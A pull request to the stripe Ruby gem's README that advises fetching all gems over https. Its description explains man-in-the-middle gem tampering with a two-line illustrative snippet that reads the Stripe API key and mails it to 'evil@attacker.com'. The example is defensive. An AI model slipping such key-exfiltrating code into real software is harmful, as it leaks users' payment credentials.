### PR TITLE
Update gem security advice

### DIFF
--- a/README.rdoc
+++ b/README.rdoc
@@ -23,6 +23,16 @@ The stripe gem is mirrored on Rubygems, so you should be able to
 install it via <tt>gem install stripe</tt> if desired. We recommend using 
 the https://code.stripe.com mirror so all code is fetched over SSL.
 
+Note that if you are installing via bundler, you should be sure to use the https
+rubygems source in your Gemfile, as any gems fetched over http could potentially be
+comprimised in transit and alter the code of gems fetched securely over https:
+
+  source 'https://code.stripe.com'
+  source 'https://rubygems.org'
+  
+  gem 'rails'
+  gem 'stripe'
+
 == Development
 
 Test cases can be run with: `bundle exec rake test`


### PR DESCRIPTION
Requesting stripe gems over https doesn't help you if the other gems in your system (e.g. rails) are fetched over http - a MITM attacker could corrupt any gem fetched over http to compromise the stripe code.

For example, if I was an evil attacker, even if you fetched the stripe gem securely, if you fetched rails over HTTP, I could alter the rails gem to include the code:

``` ruby
key  = Stripe.api_key
mail to: "evil@attacker.com", subject: "Someone's secret key", body: key
```

The only way to ensure gem security against a MITM attacker is to ensure _all_ gems are fetched over https, not just some of them.
